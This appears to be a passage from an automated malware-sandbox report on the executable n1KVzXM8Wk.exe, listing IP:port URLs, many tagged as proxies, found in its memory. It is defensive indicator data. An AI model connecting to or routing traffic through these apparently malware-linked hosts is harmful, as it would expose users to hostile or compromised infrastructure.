                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:29466
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:29466://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994D37000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:36702
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994D37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:36702://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:48487
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:48487://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199563E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:46695
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199563E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:46695://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:14321
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:14321://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:48487
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:48487://proxyx
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.248.237.89:64672
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.248.237.89:64672://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994F44000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.27.58.70:8080
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994F5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.27.58.70:8080://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199857A000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119985E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.242:36763
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119985E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.242:36763://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995C0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.154.105:3128
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.154.105:3128://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.63.168.119:8000
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.63.168.119:8000://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.76.140.239:39593
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.76.140.239:39593://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.78.54.93:20000
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.78.54.93:20000://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.85.30.138
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.85.30.138://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.85.30.138:80
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.201.33.10:25283
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119997D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.201.33.10:25283://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994B50000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011993EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.201.59.70:4145
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011993EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.201.59.70:4145://proxyx
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.132.29:8000
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.132.29:8000://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199984E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.162.103:32909
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.162.103:32909://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996A84000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119968DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.162.103:45919
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119968F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.162.103:45919://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.162.103:63177
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.162.103:63177://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.190.164:8080
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.190.164:8080://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997CD2000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.206.213.202:55555
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.206.213.202:55555://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.217.61.162
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.217.61.162://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.217.61.162:80
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.22.28.62:8080
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.22.28.62:8080://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.22.28.62:8080x
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199685D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.225.255.197:63280
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996E6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.225.255.197:63280://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.227.186.83:64874
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.227.186.83:64874://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:14985
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:14985://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:1575
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:1575://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997B46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:25639
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997B46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:25639://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:10011
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:10011://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:1119
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:1119://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011993FF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:12129
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011993FF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:12129://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:15261
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:15261://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119997D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:15527
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:15527://proxyx
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998195000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:15629
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119966C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:15629://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119997D8000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:1575
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:1575://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:1759
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:1759://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995019000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:18963
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:18963://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119968A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:22599
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119968A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:22599://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:23475
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:23475://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:2355
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:2355://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:25329
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119950E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:25329://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:25341
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199458A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:25341://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AA9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:26337
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AA9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:26337://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:27869
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:27869://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:3017
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:3017://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:4479
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:4479://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:4479x
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:4929
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199563E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:4929://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:5343
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:5343://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199A888000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:6169
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119997D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:6169://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:6347
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:6347://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:6533
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:6533://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:7679
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:7679://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:9245
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:9245://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AA9D000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:12487
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:12487://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119994D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:14299
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119994D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:14299://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997B83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:16147
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997B83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:16147://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:1759
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:1759://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997EE4000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997DE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:19331
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997DE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:19331://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:20779
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:20779://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119942A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:22035
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119942A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:22035://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:24971
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:24971://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:25329
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:25329://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:25527
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199684E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:25527://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199496B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:27917
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199496B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:27917://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995435000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:3017
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:3017://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119968DC000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996D79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:30583
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119968FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:30583://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199563E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:5495
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199563E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:5495://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119942A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:5769
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119942A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:5769://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:7071
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:7071://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199563E000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199A8AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:8063
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995457000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:8063://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199563E000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:9039
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:9039://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119967F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.230:23685
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.230:23685://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.230:31375
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.230:31375://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119983E0000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119994D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.230:6193
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119984D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.230:6193://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AA9D000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:14215
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AA9D000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:14215://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:18345
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:18345://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011993EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:18681
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011993EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:18681://proxy
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199804C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:2017
